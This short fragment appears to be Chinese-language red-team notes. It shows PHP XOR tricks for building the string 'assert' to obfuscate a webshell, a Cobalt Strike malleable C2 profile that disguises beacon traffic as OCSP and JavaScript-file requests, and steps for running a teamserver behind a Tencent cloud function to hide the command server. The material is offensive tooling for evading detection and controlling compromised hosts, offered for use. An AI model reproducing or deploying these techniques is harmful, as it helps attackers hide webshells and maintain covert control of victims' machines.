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<?php echo ("x"^"3")."<br/>"; // 左侧为我们想要的字符 x ,这个异或的返回结果为 K echo ("3"^"K")."<br/>"; // 我们将上个结果 K 放到右侧,左侧为上个异或的右侧 3 ,即可成功返回 x
// 循环上边两个步骤,便可以不断尝试出我们想要的字符所对应的异或 echo ("3"^"R")."<br/>"; // a echo ("3"^"@")."<br/>"; // s echo ("3"^"@")."<br/>"; // s echo ("3"^"V")."<br/>"; // e echo ("3"^"A")."<br/>"; // r echo ("3"^"G")."<br/>"; // t
set sample_name "t"; set sleeptime "3000"; set jitter "0"; set maxdns "255"; set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get { set uri "/api/x"; client { header "Accept""*/*"; metadata { base64; prepend "SESSIONID="; header "Cookie"; } } server { header "Content-Type""application/ocsp-response"; header "content-transfer-encoding""binary"; header "Server""Nodejs"; output { base64; print; } } } http-stager { set uri_x86 "/vue.min.js"; set uri_x64 "/bootstrap-2.min.js"; }
http-post { set uri "/api/y"; client { header "Accept""*/*"; id { base64; prepend "JSESSION="; header "Cookie"; } output { base64; print; } } server { header "Content-Type""application/ocsp-response"; header "content-transfer-encoding""binary"; header "Connection""keep-alive"; output { base64; print; } } }
开启Cobalt Strike服务端./teamserver ip password tencent.profile 本地连接Cobal Strike,新添加个监听,将腾讯云函数的默认访问地址复制过来,复制的时候注意掐头去尾,不要http://,不要:80